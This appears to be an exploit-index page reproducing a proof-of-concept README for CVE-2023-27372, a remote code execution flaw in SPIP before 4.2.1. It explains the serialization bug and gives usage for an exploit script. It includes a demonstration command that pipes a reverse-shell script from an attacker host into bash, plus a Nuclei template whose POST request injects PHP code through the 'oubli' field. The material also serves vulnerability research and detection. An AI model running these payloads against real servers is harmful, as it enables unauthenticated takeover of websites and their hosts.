Share
## https://sploitus.com/exploit?id=C94D5286-9F54-5BC6-A559-239B69DA26B9
<div align="center">

![Banner](https://i.imgur.com/daQKVTr.png)

----

# CVE-2023-27372

SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. Vulnerable versions are <3.2.18, <4.0.10, <4.1.18 and <4.2.1.

</div>

## Vulnerability explanation

This vulnerability exploits 2 bugs to abuse a too permissive variable sanitization function in order to inject PHP code :

- Use of a dangerous tag ([#ENV**](https://www.spip.net/fr_article4014.html)) in the password reset feature template :

```
<!-- File : /squelettes-dist/formulaires/oubli.html -->
<input[ (#HTML5|?{type="email" class="text email" autofocus="autofocus" required="required",type="text" class="text"})] name='oubli' id='oubli' value="#ENV**{oubli}" autocapitalize="off" autocorrect="off" />
```

- The wrong regex is used in the [protege_champ()](https://git.spip.net/spip/spip/src/commit/4b83cb23ccbaa433fedc51040479230115bb4b5c/ecrire/balise/formulaire_.php#L16) function, as no processing is performed on serialized strings :

```
<!-- File : /ecrire/balise/formulaire_.php -->
if ((preg_match(",^[abis]:\d+[:;],", $texte) and @unserialize($texte) != false) or is_null($texte)) {
    return $texte; // $texte = $_POST['oubli']
```

It is possible to inject a serialized PHP string containing PHP code into the variable `$_POST['oubli']` when resetting a password on the endpoint /spip.php?page=spip_pass in order to have an RCE on the server.

Manual example :

![Burp_screenshot](https://i.imgur.com/ozSZ0Pw.png)

![Phpinfo_screenshot](https://i.imgur.com/rsOhnEA.png)

## Usage

```
โฏ ./CVE-2023-27372.py -h
usage: CVE-2023-27372.py [-h] -u URL -c COMMAND [-v]

Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     SPIP application base URL
  -c COMMAND, --command COMMAND
                        Command to execute
  -v, --verbose         Verbose mode. (default: False)
```

## Demonstration

```
./CVE-2023-27372.py -u https://spip.local.com -c 'curl https://attacker.server/revshell.sh|bash' -v
```

## How to setup test environment ?

Dockerfile:

```bash
FROM ubuntu:20.04 as base
ARG DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y \
		php \
		php-xml \
		php-zip \
		php-sqlite3 \
		unzip
ADD https://files.spip.net/spip/archives/spip-v4.2.0.zip /tmp/
RUN unzip /tmp/spip-v4.2.0.zip -d /var/www/
RUN cd /var/www/ && php -S 0.0.0.0:8000
```

## Nuclei template

![Nuclei_screen](https://i.imgur.com/HWYCtoh.png)

```yaml
id: CVE-2023-27372

info:
  name: SPIP - Remote Command Execution
  author: DhiyaneshDK,nuts7
  severity: critical
  description: |
    SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
  reference:
    - https://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27372
    - https://github.com/nuts7/CVE-2023-27372
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27372
  metadata:
    max-request: 1
    shodan-query: html:"spip.php?page=backend"
    verified: "true"
  tags: cve,cve2023,spip,rce

http:
  - raw:
      - |
        GET /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /spip.php?page=spip_pass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        page=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:"<?php phpinfo(); ?>";

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "PHP Extension"
          - "PHP Version"
          - "<!DOCTYPE html"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body_1
        regex:
          - "name='formulaire_action_args'[^>]*value='([^']*)'"

      - type: regex
        part: body_2
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
```

## References

- https://nvd.nist.gov/vuln/detail/CVE-2023-27372
- https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-2-1-SPIP-4-1-8-SPIP-4-0-10-et.html
- https://git.spip.net/spip/spip/commit/5aedf49b89415a4df3eb775eee3801a2b4b88266
- https://git.spip.net/spip/spip/commit/96fbeb38711c6706e62457f2b732a652a04a409d
- https://www.debian.org/security/2023/dsa-5367
- http://packetstormsecurity.com/files/171921/SPIP-Remote-Command-Execution.html
- https://therealcoiffeur.com/c11010
- https://github.com/rapid7/metasploit-framework/pull/17711/files